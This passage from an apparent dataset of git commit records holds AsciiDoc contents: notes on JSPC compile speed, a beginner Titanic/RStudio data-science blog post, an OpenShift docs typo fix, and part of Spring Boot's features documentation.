JSPC\n\nIn version 1.1.0 of the plugin, it takes all of the jsp and call execute JSPC for each of them.\nThis is the code : \n\n[source,java]\n====\nfor (String fileName : jspFiles) {\n\tjspc.setJspFiles(fileName);\n\tgetLog().info(\"Compiling \" + fileName);\n\tjspc.execute();\n}\n\n====\n\nMaybe it's an optimization with Tomcat 6.X, but I think with Tomcat 8.X it's slower than giving all JSP directly to JSPC.execute();\nSee pull request TODO to fix this.\n\n=== Execute compilation in parallel\n\nTo compile faster we need to compile in parallel.\nIndeed when we launch JavaMissionControl for example, we see the CPU is 20%-30% usage when compiling.\nTo increase CPU usage, we need to execute jspc in different thread.\nSee pull request TODO to add this feature.\n\n=== Benchmark\n\nI made a little benchmark with two projects : one with 400 jsp and one with 3000 jsp.\n","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"3915cae0eab2cd818649d5c53c4038f7ce9d0e53","subject":"Update 2017-04-16-Predict-Survival-Propensity-of-Titanic-Passengers.adoc","message":"Update 2017-04-16-Predict-Survival-Propensity-of-Titanic-Passengers.adoc","repos":"roobyz\/roobyz.github.io,roobyz\/roobyz.github.io,roobyz\/roobyz.github.io,roobyz\/roobyz.github.io","old_file":"_posts\/2017-04-16-Predict-Survival-Propensity-of-Titanic-Passengers.adoc","new_file":"_posts\/2017-04-16-Predict-Survival-Propensity-of-Titanic-Passengers.adoc","new_contents":"\/\/ = Your Blog title\n\/\/ See https:\/\/hubpress.gitbooks.io\/hubpress-knowledgebase\/content\/ for information about the parameters.\n\/\/ :hp-image: \/covers\/cover.png\n\/\/ :published_at: 2019-01-31\n\/\/ :hp-tags: HubPress, Blog, Open_Source,\n\/\/ :hp-alt-title: My English Title\n\n= Titanic: Learning Data Science with RStudio\n:hp-alt-title: Predict Survival Propensity of Titanic Passengers\n:hp-tags: Blog, Open_Source, Machine_Learning, Analytics, Data_Science\n\nSo we are aspiring data scientists and want to dip our toes into link:http:\/\/rmarkdown.rstudio.com\/[RStudio]. How do we get started? We dive into the into the waters of the link:https:\/\/www.kaggle.com\/c\/titanic[Kaggle Titanic \"Competition\"], of course!\n\nOur objective: \n\n* learn how to think about the competition from a data science perspective\n* get somewhat comfortable with RStudio\n* predict whether or not a passenger would survive the sinking of the link:https:\/\/en.wikipedia.org\/wiki\/RMS_Titanic[RMS Titanic]\n* enter a Kaggle submission file for evaluation\n* profit!\n\n== Kaggle Basics\n\nKaggle is a community of data scientists and a platform for facilitating data science journeys. One way to participate, is by entering data science competitions. Similar to other competitions, Kaggle provides two Titanic datasets containing passenger attributes:\n\n* a _training set_, complete with the outcome (target) variable for training our predictive model(s)\n* a _test set_, for predicting the unknown outcome variable based on the passenger attributes provided in both datasets.\n\nAfter training and validating our predictive model(s), we can then enter the submission file to Kaggle for evaluation. As we iterate, we can submit more files and assess our progress on the leaderboard. Subtle model improvements can lead to significant leaps on the leaderboard.\n\n\/\/[icon=\"\/images\/note.png\"]\n[NOTE]\n.*Data Science Perspective*\n=====================================\nWe need to use the provided attributes (variables) to train a predictive model, and how does that work? Some variables are correlated with each other. When those variables vary, the correlated variables will also vary to some degree. We need to:\n\n- maximize the number of explanatory variables: those that are correlated with the outcome variable, and \n- minimize the correlation of explanatory variables to each other (link:https:\/\/en.wikipedia.org\/wiki\/Multicollinearity[multicollinearity]).\n\nIn other words, we need to find the fewest quantity of variables that can explain everything that is going on with the outcome that we want to predict.\n=====================================\n\n== Titanic History Lesson\n\nThe Titanic was a British passenger liner that sank after colliding with an iceberg in the Atlantic on its maiden voyage en route to New York City. It was the largest ship of its time with 10 decks, 8 of which were for passengers. \n\nThere were 2,224 passengers and crew aboard. Of the 1,317 passengers, there were: 324 in First Class (including some of the wealthiest people of the time), 284 in Second Class, and 709 in Third Class. Of these, 869 (66%) were male and 447 (34%) female. There were 107 children aboard, the largest number of which were in Third Class.\n\nThe ship had enough lifeboats for about 1,100 passengers, and more than 1,500 died. Due to the \"women and children first\" protocol, men were disproportionately left aboard. Also, not all lifeboats were completely filled during the evacuation. The 705 surviving passengers were rescued by the RMS Carpathia around 2 hours after the catastrophe.\n\n== Tutorial Approach\n\nWe'll approach this project in multiple parts. This is still a work in progress, but roughly speaking it should look like:\n\n. Part 1: Basic Setup\n. Part 2: Feature Engineering\n. Part 3: Prediction\n. Part 4: Conclusion\n\n[source, Rmd]\n.test.Rmd\n----\nsetwd(\"\/home\/rstudio\/code\")\n\ntrnFile = \"data\/pml-har-trn.csv\"\ntstFile = \"data\/pml-har-tst.csv\"\nif (!file.exists(trnFile)) {\n trnfileUrl <- \"https:\/\/d396qusza40orc.cloudfront.net\/predmachlearn\/pml-training.csv\"\n download.file(trnfileUrl, destfile = trnFile, method = \"curl\")\n}\nif (!file.exists(tstFile)) {\n tstfileUrl <- \"https:\/\/d396qusza40orc.cloudfront.net\/predmachlearn\/pml-testing.csv\"\n download.file(tstfileUrl, destfile = tstFile, method = \"curl\")\n}\n----\n\n\n","old_contents":"\/\/ = Your Blog title\n\/\/ See https:\/\/hubpress.gitbooks.io\/hubpress-knowledgebase\/content\/ for information about the parameters.\n\/\/ :hp-image: \/covers\/cover.png\n\/\/ :published_at: 2019-01-31\n\/\/ :hp-tags: HubPress, Blog, Open_Source,\n\/\/ :hp-alt-title: My English Title\n\n= Titanic: Learning Data Science with RStudio\n:hp-alt-title: Predict Survival Propensity of Titanic Passengers\n:hp-tags: Blog, Open_Source, Machine_Learning, Analytics, Data_Science\n\nSo we are aspiring data scientists and want to dip our toes into link:http:\/\/rmarkdown.rstudio.com\/[RStudio]. How do we get started? We dive into the into the waters of the link:https:\/\/www.kaggle.com\/c\/titanic[Kaggle Titanic \"Competition\"], of course!\n\nOur objective: \n\n* learn how to think about the competition from a data science perspective\n* get somewhat comfortable with RStudio\n* predict whether or not a passenger would survive the sinking of the link:https:\/\/en.wikipedia.org\/wiki\/RMS_Titanic[RMS Titanic]\n* enter a Kaggle submission file for evaluation\n* profit!\n\n== Kaggle Basics\n\nKaggle is a community of data scientists and a platform for facilitating data science journeys. One way to participate, is by entering data science competitions. Similar to other competitions, Kaggle provides two Titanic datasets containing passenger attributes:\n\n* a _training set_, complete with the outcome (target) variable for training our predictive model(s)\n* a _test set_, for predicting the unknown outcome variable based on the passenger attributes provided in both datasets.\n\nAfter training and validating our predictive model(s), we can then enter the submission file to Kaggle for evaluation. As we iterate, we can submit more files and assess our progress on the leaderboard. Subtle model improvements can lead to significant leaps on the leaderboard.\n\n\/\/[icon=\"\/images\/note.png\"]\n[NOTE]\n.*Data Science Perspective*\n=====================================\nWe need to use the provided attributes (variables) to train a predictive model, and how does that work? Some variables are correlated with each other. When those variables vary, the correlated variables will also vary to some degree. We need to:\n\n- maximize the number of explanatory variables: those that are correlated with the outcome variable, and \n- minimize the correlation of explanatory variables to each other (link:https:\/\/en.wikipedia.org\/wiki\/Multicollinearity[multicollinearity]).\n\nIn other words, we need to find the fewest quantity of variables that can explain everything that is going on with the outcome that we want to predict.\n=====================================\n\n== Titanic History Lesson\n\nThe Titanic was a British passenger liner that sank after colliding with an iceberg in the Atlantic on its maiden voyage en route to New York City. It was the largest ship of its time with 10 decks, 8 of which were for passengers. \n\nThere were 2,224 passengers and crew aboard. Of the 1,317 passengers, there were: 324 in First Class (including some of the wealthiest people of the time), 284 in Second Class, and 709 in Third Class. Of these, 869 (66%) were male and 447 (34%) female. There were 107 children aboard, the largest number of which were in Third Class.\n\nThe ship had enough lifeboats for about 1,100 passengers, and more than 1,500 died. Due to the \"women and children first\" protocol, men were disproportionately left aboard. Also, not all lifeboats were completely filled during the evacuation. The 705 surviving passengers were rescued by the RMS Carpathia around 2 hours after the catastrophe.\n\n== Tutorial Approach\n\nWe'll approach this project in multiple parts. This is still a work in progress, but roughly speaking it should look like:\n\n. Part 1: Basic Setup\n. Part 2: Feature Engineering\n. Part 3: Prediction\n. Part 4: Conclusion\n\n","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"1e37733198343874e1f060509fa320f2753fab98","subject":"Bug BZ1906842 Corrected typo in Compliance Operator Manage Doc","message":"Bug BZ1906842 Corrected typo in Compliance Operator Manage Doc\n","repos":"vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs","old_file":"security\/compliance_operator\/compliance-operator-manage.adoc","new_file":"security\/compliance_operator\/compliance-operator-manage.adoc","new_contents":"[id=\"compliance-operator-understanding\"]\n= Managing the Compliance Operator\ninclude::modules\/common-attributes.adoc[]\n:context: managing-compliance\n\ntoc::[]\n\nThis section describes the lifecycle of security content, including how to use an updated version of compliance content and how to create a custom `ProfileBundle` object.\n\ninclude::modules\/compliance-update.adoc[leveloffset=+1]\n\ninclude::modules\/compliance-imagestreams.adoc[leveloffset=+1]\n\ninclude::modules\/compliance-profilebundle.adoc[leveloffset=+1]\n","old_contents":"[id=\"compliance-operator-understanding\"]\n= Managinging the Compliance Operator\ninclude::modules\/common-attributes.adoc[]\n:context: managing-compliance\n\ntoc::[]\n\nThis section describes the lifecycle of security content, including how to use an updated version of compliance content and how to create a custom `ProfileBundle` object.\n\ninclude::modules\/compliance-update.adoc[leveloffset=+1]\n\ninclude::modules\/compliance-imagestreams.adoc[leveloffset=+1]\n\ninclude::modules\/compliance-profilebundle.adoc[leveloffset=+1]\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"ab7bec11603f6178f2b10135def22bea74e8cb39","subject":"Update clarify of bean conditions","message":"Update clarify of bean conditions\n\nSee gh-4104\n","repos":"olivergierke\/spring-boot,michael-simons\/spring-boot,javyzheng\/spring-boot,srikalyan\/spring-boot,philwebb\/spring-boot,Buzzardo\/spring-boot,bclozel\/spring-boot,javyzheng\/spring-boot,ptahchiev\/spring-boot,rweisleder\/spring-boot,mevasaroj\/jenkins2-course-spring-boot,mbogoevici\/spring-boot,kdvolder\/spring-boot,neo4j-contrib\/spring-boot,mdeinum\/spring-boot,bbrouwer\/spring-boot,RichardCSantana\/spring-boot,kdvolder\/spring-boot,ameraljovic\/spring-boot,drumonii\/spring-boot,vakninr\/spring-boot,joansmith\/spring-boot,mbogoevici\/spring-boot,ameraljovic\/spring-boot,pvorb\/spring-boot,nebhale\/spring-boot,xiaoleiPENG\/my-project,xiaoleiPENG\/my-project,zhanhb\/spring-boot,NetoDevel\/spring-boot,bjornlindstrom\/spring-boot,i007422\/jenkins2-course-spring-boot,dreis2211\/spring-boot,herau\/spring-boot,jmnarloch\/spring-boot,hello2009chen\/spring-boot,mdeinum\/spring-boot,deki\/spring-boot,Buzzardo\/spring-boot,javyzheng\/spring-boot,SaravananParthasarathy\/SPSDemo,mbogoevici\/spring-boot,bjornlindstrom\/spring-boot,deki\/spring-boot,ptahchiev\/spring-boot,qerub\/spring-boot,jmnarloch\/spring-boot,bijukunjummen\/spring-boot,tsachev\/spring-boot,ollie314\/spring-boot,shakuzen\/spring-boot,jvz\/spring-boot,ptahchiev\/spring-boot,spring-projects\/spring-boot,ameraljovic\/spring-boot,philwebb\/spring-boot-concourse,lenicliu\/spring-boot,minmay\/spring-boot,izeye\/spring-boot,yangdd1205\/spring-boot,hello2009chen\/spring-boot,royclarkson\/spring-boot,ihoneymon\/spring-boot,NetoDevel\/spring-boot,mdeinum\/spring-boot,bijukunjummen\/spring-boot,shangyi0102\/spring-boot,yangdd1205\/spring-boot,i007422\/jenkins2-course-spring-boot,chrylis\/spring-boot,philwebb\/spring-boot,akmaharshi\/jenkins,hello2009chen\/spring-boot,afroje-reshma\/spring-boot-sample,thomasdarimont\/spring-boot,philwebb\/spring-boot,herau\/spring-boot,ptahchiev\/spring-boot,jbovet\/spring-boot,scottfrederick\/spring-boot,ihoneymon\/spring-boot,neo4j-contrib\/spring-boot,olivergierke\/spring-boot,sbcoba\/spring-boot,kdvolder\/spring-boot,minmay\/spring-boot,felipeg48\/spring-boot,lburgazzoli\/spring-boot,mevasaroj\/jenkins2-course-spring-boot,eddumelendez\/spring-boot,mbenson\/spring-boot,ilayaperumalg\/spring-boot,isopov\/spring-boot,SaravananParthasarathy\/SPSDemo,tsachev\/spring-boot,dfa1\/spring-boot,herau\/spring-boot,olivergierke\/spring-boot,Nowheresly\/spring-boot,royclarkson\/spring-boot,felipeg48\/spring-boot,linead\/spring-boot,sebastiankirsch\/spring-boot,xiaoleiPENG\/my-project,wilkinsona\/spring-boot,dreis2211\/spring-boot,kamilszymanski\/spring-boot,hqrt\/jenkins2-course-spring-boot,mbenson\/spring-boot,brettwooldridge\/spring-boot,spring-projects\/spring-boot,mevasaroj\/jenkins2-course-spring-boot,bclozel\/spring-boot,qerub\/spring-boot,bijukunjummen\/spring-boot,joansmith\/spring-boot,shangyi0102\/spring-boot,dfa1\/spring-boot,spring-projects\/spring-boot,rajendra-chola\/jenkins2-course-spring-boot,bbrouwer\/spring-boot,joshthornhill\/spring-boot,RichardCSantana\/spring-boot,zhangshuangquan\/spring-root,mosoft521\/spring-boot,thomasdarimont\/spring-boot,htynkn\/spring-boot,neo4j-contrib\/spring-boot,ihoneymon\/spring-boot,felipeg48\/spring-boot,donhuvy\/spring-boot,philwebb\/spring-boot-concourse,ilayaperumalg\/spring-boot,afroje-reshma\/spring-boot-sample,RichardCSantana\/spring-boot,rajendra-chola\/jenkins2-course-spring-boot,jayarampradhan\/spring-boot,donhuvy\/spring-boot,htynkn\/spring-boot,zhangshuangquan\/spring-root,sbuettner\/spring-boot,lenicliu\/spring-boot,philwebb\/spring-boot-concourse,lenicliu\/spring-boot,minmay\/spring-boot,jvz\/spring-boot,ilayaperumalg\/spring-boot,drumonii\/spring-boot,aahlenst\/spring-boot,hello2009chen\/spring-boot,neo4j-contrib\/spring-boot,felipeg48\/spring-boot,sbuettner\/spring-boot,mosoft521\/spring-boot,royclarkson\/spring-boot,afroje-reshma\/spring-boot-sample,chrylis\/spring-boot,jbovet\/spring-boot,Buzzardo\/spring-boot,izeye\/spring-boot,shakuzen\/spring-boot,SaravananParthasarathy\/SPSDemo,jxblum\/spring-boot,mbogoevici\/spring-boot,royclarkson\/spring-boot,izeye\/spring-boot,mevasaroj\/jenkins2-course-spring-boot,sebastiankirsch\/spring-boot,habuma\/spring-boot,candrews\/spring-boot,kamilszymanski\/spring-boot,spring-projects\/spring-boot,zhanhb\/spring-boot,DeezCashews\/spring-boot,jxblum\/spring-boot,philwebb\/spring-boot-concourse,neo4j-contrib\/spring-boot,philwebb\/spring-boot,DeezCashews\/spring-boot,NetoDevel\/spring-boot,i007422\/jenkins2-course-spring-boot,drumonii\/spring-boot,shakuzen\/spring-boot,cleverjava\/jenkins2-course-spring-boot,joansmith\/spring-boot,jbovet\/spring-boot,lucassaldanha\/spring-boot,lucassaldanha\/spring-boot,zhangshuangquan\/spring-root,afroje-reshma\/spring-boot-sample,zhangshuangquan\/spring-root,habuma\/spring-boot,DeezCashews\/spring-boot,kdvolder\/spring-boot,jxblum\/spring-boot,mrumpf\/spring-boot,candrews\/spring-boot,tsachev\/spring-boot,jayarampradhan\/spring-boot,qerub\/spring-boot,tiarebalbi\/spring-boot,drumonii\/spring-boot,michael-simons\/spring-boot,thomasdarimont\/spring-boot,javyzheng\/spring-boot,srikalyan\/spring-boot,aahlenst\/spring-boot,lucassaldanha\/spring-boot,hqrt\/jenkins2-course-spring-boot,tiarebalbi\/spring-boot,izeye\/spring-boot,rweisleder\/spring-boot,bijukunjummen\/spring-boot,yhj630520\/spring-boot,rajendra-chola\/jenkins2-course-spring-boot,eddumelendez\/spring-boot,rweisleder\/spring-boot,lburgazzoli\/spring-boot,habuma\/spring-boot,donhuvy\/spring-boot,rweisleder\/spring-boot,qerub\/spring-boot,royclarkson\/spring-boot,Nowheresly\/spring-boot,tsachev\/spring-boot,vakninr\/spring-boot,vpavic\/spring-boot,vpavic\/spring-boot,brettwooldridge\/spring-boot,yhj630520\/spring-boot,NetoDevel\/spring-boot,brettwooldridge\/spring-boot,Buzzardo\/spring-boot,linead\/spring-boot,scottfrederick\/spring-boot,joshiste\/spring-boot,shakuzen\/spring-boot,joshiste\/spring-boot,scottfrederick\/spring-boot,sbuettner\/spring-boot,joshthornhill\/spring-boot,candrews\/spring-boot,ameraljovic\/spring-boot,mrumpf\/spring-boot,bclozel\/spring-boot,chrylis\/spring-boot,wilkinsona\/spring-boot,jmnarloch\/spring-boot,akmaharshi\/jenkins,ptahchiev\/spring-boot,nebhale\/spring-boot,sbuettner\/spring-boot,ilayaperumalg\/spring-boot,zhanhb\/spring-boot,mbenson\/spring-boot,jmnarloch\/spring-boot,tiarebalbi\/spring-boot,joshiste\/spring-boot,lburgazzoli\/spring-boot,dreis2211\/spring-boot,akmaharshi\/jenkins,mbogoevici\/spring-boot,ilayaperumalg\/spring-boot,lburgazzoli\/spring-boot,chrylis\/spring-boot,dreis2211\/spring-boot,jxblum\/spring-boot,aahlenst\/spring-boot,akmaharshi\/jenkins,aahlenst\/spring-boot,ihoneymon\/spring-boot,jvz\/spring-boot,sbcoba\/spring-boot,mbenson\/spring-boot,Nowheresly\/spring-boot,vpavic\/spring-boot,drumonii\/spring-boot,bbrouwer\/spring-boot,RichardCSantana\/spring-boot,eddumelendez\/spring-boot,dreis2211\/spring-boot,lenicliu\/spring-boot,spring-projects\/spring-boot,vakninr\/spring-boot,ihoneymon\/spring-boot,shangyi0102\/spring-boot,tiarebalbi\/spring-boot,bijukunjummen\/spring-boot,mbenson\/spring-boot,yhj630520\/spring-boot,jxblum\/spring-boot,bclozel\/spring-boot,izeye\/spring-boot,RichardCSantana\/spring-boot,rweisleder\/spring-boot,vpavic\/spring-boot,michael-simons\/spring-boot,sbcoba\/spring-boot,linead\/spring-boot,lexandro\/spring-boot,pvorb\/spring-boot,cleverjava\/jenkins2-course-spring-boot,donhuvy\/spring-boot,lburgazzoli\/spring-boot,jayarampradhan\/spring-boot,mrumpf\/spring-boot,ollie314\/spring-boot,isopov\/spring-boot,joshiste\/spring-boot,olivergierke\/spring-boot,jvz\/spring-boot,zhanhb\/spring-boot,rajendra-chola\/jenkins2-course-spring-boot,mrumpf\/spring-boot,yhj630520\/spring-boot,joshiste\/spring-boot,scottfrederick\/spring-boot,bbrouwer\/spring-boot,philwebb\/spring-boot,bclozel\/spring-boot,candrews\/spring-boot,Buzzardo\/spring-boot,mosoft521\/spring-boot,DeezCashews\/spring-boot,wilkinsona\/spring-boot,isopov\/spring-boot,dfa1\/spring-boot,bjornlindstrom\/spring-boot,dfa1\/spring-boot,sbcoba\/spring-boot,xiaoleiPENG\/my-project,hqrt\/jenkins2-course-spring-boot,sbcoba\/spring-boot,habuma\/spring-boot,shakuzen\/spring-boot,thomasdarimont\/spring-boot,zhanhb\/spring-boot,pvorb\/spring-boot,scottfrederick\/spring-boot,felipeg48\/spring-boot,jbovet\/spring-boot,NetoDevel\/spring-boot,javyzheng\/spring-boot,nebhale\/spring-boot,afroje-reshma\/spring-boot-sample,mdeinum\/spring-boot,ollie314\/spring-boot,chrylis\/spring-boot,rajendra-chola\/jenkins2-course-spring-boot,htynkn\/spring-boot,tsachev\/spring-boot,herau\/spring-boot,joshthornhill\/spring-boot,zhanhb\/spring-boot,vpavic\/spring-boot,kdvolder\/spring-boot,lexandro\/spring-boot,jbovet\/spring-boot,michael-simons\/spring-boot,pvorb\/spring-boot,tsachev\/spring-boot,joshthornhill\/spring-boot,herau\/spring-boot,minmay\/spring-boot,yangdd1205\/spring-boot,candrews\/spring-boot,felipeg48\/spring-boot,nebhale\/spring-boot,sbuettner\/spring-boot,philwebb\/spring-boot-concourse,kamilszymanski\/spring-boot,lexandro\/spring-boot,michael-simons\/spring-boot,jvz\/spring-boot,kamilszymanski\/spring-boot,mbenson\/spring-boot,cleverjava\/jenkins2-course-spring-boot,mdeinum\/spring-boot,donhuvy\/spring-boot,SaravananParthasarathy\/SPSDemo,cleverjava\/jenkins2-course-spring-boot,wilkinsona\/spring-boot,shakuzen\/spring-boot,hello2009chen\/spring-boot,dreis2211\/spring-boot,i007422\/jenkins2-course-spring-boot,ptahchiev\/spring-boot,bclozel\/spring-boot,eddumelendez\/spring-boot,vpavic\/spring-boot,ollie314\/spring-boot,yhj630520\/spring-boot,Buzzardo\/spring-boot,isopov\/spring-boot,htynkn\/spring-boot,brettwooldridge\/spring-boot,donhuvy\/spring-boot,zhangshuangquan\/spring-root,sebastiankirsch\/spring-boot,michael-simons\/spring-boot,bjornlindstrom\/spring-boot,brettwooldridge\/spring-boot,minmay\/spring-boot,ameraljovic\/spring-boot,aahlenst\/spring-boot,spring-projects\/spring-boot,kamilszymanski\/spring-boot,DeezCashews\/spring-boot,Nowheresly\/spring-boot,ihoneymon\/spring-boot,scottfrederick\/spring-boot,cleverjava\/jenkins2-course-spring-boot,wilkinsona\/spring-boot,lucassaldanha\/spring-boot,philwebb\/spring-boot,olivergierke\/spring-boot,deki\/spring-boot,aahlenst\/spring-boot,srikalyan\/spring-boot,i007422\/jenkins2-course-spring-boot,hqrt\/jenkins2-course-spring-boot,SaravananParthasarathy\/SPSDemo,dfa1\/spring-boot,jayarampradhan\/spring-boot,isopov\/spring-boot,drumonii\/spring-boot,tiarebalbi\/spring-boot,tiarebalbi\/spring-boot,rweisleder\/spring-boot,mevasaroj\/jenkins2-course-spring-boot,mosoft521\/spring-boot,sebastiankirsch\/spring-boot,hqrt\/jenkins2-course-spring-boot,nebhale\/spring-boot,bbrouwer\/spring-boot,jxblum\/spring-boot,pvorb\/spring-boot,kdvolder\/spring-boot,shangyi0102\/spring-boot,linead\/spring-boot,xiaoleiPENG\/my-project,bjornlindstrom\/spring-boot,srikalyan\/spring-boot,ollie314\/spring-boot,deki\/spring-boot,mosoft521\/spring-boot,isopov\/spring-boot,lexandro\/spring-boot,htynkn\/spring-boot,chrylis\/spring-boot,joansmith\/spring-boot,akmaharshi\/jenkins,qerub\/spring-boot,jmnarloch\/spring-boot,lenicliu\/spring-boot,linead\/spring-boot,jayarampradhan\/spring-boot,sebastiankirsch\/spring-boot,joansmith\/spring-boot,joshiste\/spring-boot,joshthornhill\/spring-boot,thomasdarimont\/spring-boot,lexandro\/spring-boot,lucassaldanha\/spring-boot,Nowheresly\/spring-boot,eddumelendez\/spring-boot,wilkinsona\/spring-boot,shangyi0102\/spring-boot,habuma\/spring-boot,habuma\/spring-boot,mdeinum\/spring-boot,vakninr\/spring-boot,eddumelendez\/spring-boot,srikalyan\/spring-boot,mrumpf\/spring-boot,vakninr\/spring-boot,htynkn\/spring-boot,ilayaperumalg\/spring-boot,deki\/spring-boot","old_file":"spring-boot-docs\/src\/main\/asciidoc\/spring-boot-features.adoc","new_file":"spring-boot-docs\/src\/main\/asciidoc\/spring-boot-features.adoc","new_contents":"[[boot-features]]\n= Spring Boot features\n\n[partintro]\n--\nThis section dives into the details of Spring Boot. Here you can learn about the key\nfeatures that you will want to use and customize. If you haven't already, you might want\nto read the _<<getting-started.adoc#getting-started>>_ and\n_<<using-spring-boot.adoc#using-boot>>_ sections so that you have a good grounding\nof the basics.\n--\n\n\n\n[[boot-features-spring-application]]\n== SpringApplication\nThe `SpringApplication` class provides a convenient way to bootstrap a Spring application\nthat will be started from a `main()` method. In many situations you can just delegate to\nthe static `SpringApplication.run` method:\n\n[source,java,indent=0]\n----\n\tpublic static void main(String[] args) {\n\t\tSpringApplication.run(MySpringConfiguration.class, args);\n\t}\n----\n\nWhen your application starts you should see something similar to the following:\n\n[indent=0,subs=\"attributes\"]\n----\n . ____ _ __ _ _\n \/\\\\ \/ ___'_ __ _ _(_)_ __ __ _ \\ \\ \\ \\\n( ( )\\___ | '_ | '_| | '_ \\\/ _` | \\ \\ \\ \\\n \\\\\/ ___)| |_)| | | | | || (_| | ) ) ) )\n ' |____| .__|_| |_|_| |_\\__, | \/ \/ \/ \/\n =========|_|==============|___\/=\/_\/_\/_\/\n :: Spring Boot :: v{spring-boot-version}\n\n2013-07-31 00:08:16.117 INFO 56603 --- [ main] o.s.b.s.app.SampleApplication : Starting SampleApplication v0.1.0 on mycomputer with PID 56603 (\/apps\/myapp.jar started by pwebb)\n2013-07-31 00:08:16.166 INFO 56603 --- [ main] ationConfigEmbeddedWebApplicationContext : Refreshing org.springframework.boot.context.embedded.AnnotationConfigEmbeddedWebApplicationContext@6e5a8246: startup date [Wed Jul 31 00:08:16 PDT 2013]; root of context hierarchy\n2014-03-04 13:09:54.912 INFO 41370 --- [ main] .t.TomcatEmbeddedServletContainerFactory : Server initialized with port: 8080\n2014-03-04 13:09:56.501 INFO 41370 --- [ main] o.s.b.s.app.SampleApplication : Started SampleApplication in 2.992 seconds (JVM running for 3.658)\n----\n\nBy default `INFO` logging messages will be shown, including some relevant startup details\nsuch as the user that launched the application.\n\n\n[[boot-features-banner]]\n=== Customizing the Banner\nThe banner that is printed on start up can be changed by adding a `banner.txt` file\nto your classpath, or by setting `banner.location` to the location of such a file.\nIf the file has an unusual encoding you can set `banner.charset` (default is `UTF-8`).\n\nYou can use the following variables inside your `banner.txt` file:\n\n.Banner variables\n|===\n| Variable | Description\n\n|`${application.version}`\n|The version number of your application as declared in `MANIFEST.MF`. For example `Implementation-Version: 1.0` is printed as `1.0`.\n\n|`${application.formatted-version}`\n|The version number of your application as declared in `MANIFEST.MF` formatted for\ndisplay (surrounded with brackets and prefixed with `v`). For example `(v1.0)`.\n\n|`${spring-boot.version}`\n|The Spring Boot version that you are using. For example `{spring-boot-version}`.\n\n|`${spring-boot.formatted-version}`\n|The Spring Boot version that you are using formatted for display (surrounded with\nbrackets and prefixed with `v`). For example `(v{spring-boot-version})`.\n\n|`${Ansi.NAME}` (or `${AnsiColor.NAME}`, `${AnsiBackground.NAME}`, `${AnsiStyle.NAME}`)\n|Where `NAME` is the name of an ANSI escape code. See\n{sc-spring-boot}\/ansi\/AnsiPropertySource.{sc-ext}[`AnsiPropertySource`] for details.\n|===\n\nTIP: The `SpringBootApplication.setBanner(...)` method can be used if you want to generate\na banner programmatically. Use the `org.springframework.boot.Banner` interface and\nimplement your own `printBanner()` method.\n\n\n\n[[boot-features-customizing-spring-application]]\n=== Customizing SpringApplication\nIf the `SpringApplication` defaults aren't to your taste you can instead create a local\ninstance and customize it. For example, to turn off the banner you would write:\n\n[source,java,indent=0]\n----\n\tpublic static void main(String[] args) {\n\t\tSpringApplication app = new SpringApplication(MySpringConfiguration.class);\n\t\tapp.setBannerMode(Banner.Mode.OFF);\n\t\tapp.run(args);\n\t}\n----\n\nNOTE: The constructor arguments passed to `SpringApplication` are configuration sources\nfor spring beans. In most cases these will be references to `@Configuration` classes, but\nthey could also be references to XML configuration or to packages that should be scanned.\n\nIt is also possible to configure the `SpringApplication` using an `application.properties`\nfile. See _<<boot-features-external-config>>_ for details.\n\nFor a complete list of the configuration options, see the\n{dc-spring-boot}\/SpringApplication.{dc-ext}[`SpringApplication` Javadoc].\n\n\n\n[[boot-features-fluent-builder-api]]\n=== Fluent builder API\nIf you need to build an `ApplicationContext` hierarchy (multiple contexts with a\nparent\/child relationship), or if you just prefer using a '`fluent`' builder API, you\ncan use the `SpringApplicationBuilder`.\n\nThe `SpringApplicationBuilder` allows you to chain together multiple method calls, and\nincludes `parent` and `child` methods that allow you to create a hierarchy.\n\nFor example:\n\n[source,java,indent=0]\n----\n\tnew SpringApplicationBuilder()\n\t\t.bannerMode(Banner.Mode.OFF)\n\t\t.sources(Parent.class)\n\t\t.child(Application.class)\n\t\t.run(args);\n----\n\nNOTE: There are some restrictions when creating an `ApplicationContext` hierarchy, e.g.\nWeb components *must* be contained within the child context, and the same `Environment`\nwill be used for both parent and child contexts. See the\n{dc-spring-boot}\/builder\/SpringApplicationBuilder.{dc-ext}[`SpringApplicationBuilder`\nJavadoc] for full details.\n\n\n\n[[boot-features-application-events-and-listeners]]\n=== Application events and listeners\nIn addition to the usual Spring Framework events, such as\n{spring-javadoc}\/context\/event\/ContextRefreshedEvent.{dc-ext}[`ContextRefreshedEvent`],\na `SpringApplication` sends some additional application events. Some events are actually\ntriggered before the `ApplicationContext` is created.\n\nYou can register event listeners in a number of ways, the most common being\n`SpringApplication.addListeners(...)` method.\n\nApplication events are sent in the following order, as your application runs:\n\n. An `ApplicationStartedEvent` is sent at the start of a run, but before any\n processing except the registration of listeners and initializers.\n. An `ApplicationEnvironmentPreparedEvent` is sent when the `Environment` to be used in\n the context is known, but before the context is created.\n. An `ApplicationPreparedEvent` is sent just before the refresh is started, but after bean\n definitions have been loaded.\n. An `ApplicationReadyEvent` is sent after the refresh and any related callbacks have\n been processed to indicate the application is ready to service requests.\n. An `ApplicationFailedEvent` is sent if there is an exception on startup.\n\nTIP: You often won't need to use application events, but it can be handy to know that they\nexist. Internally, Spring Boot uses events to handle a variety of tasks.\n\n\n\n[[boot-features-web-environment]]\n=== Web environment\nA `SpringApplication` will attempt to create the right type of `ApplicationContext` on\nyour behalf. By default, an `AnnotationConfigApplicationContext` or\n`AnnotationConfigEmbeddedWebApplicationContext` will be used, depending on whether you\nare developing a web application or not.\n\nThe algorithm used to determine a '`web environment`' is fairly simplistic (based on the\npresence of a few classes). You can use `setWebEnvironment(boolean webEnvironment)` if\nyou need to override the default.\n\nIt is also possible to take complete control of the `ApplicationContext` type that will\nbe used by calling `setApplicationContextClass(...)`.\n\nTIP: It is often desirable to call `setWebEnvironment(false)` when using\n`SpringApplication` within a JUnit test.\n\n\n\n[[boot-features-application-arguments]]\n=== Accessing application arguments\nIf you need to access the application arguments that were passed to\n`SpringApplication.run(...)` you can inject a\n`org.springframework.boot.ApplicationArguments` bean. The `ApplicationArguments` interface\nprovides access to both the raw `String[]` arguments as well as parsed `option` and\n`non-option` arguments:\n\n[source,java,indent=0]\n----\n\timport org.springframework.boot.*\n\timport 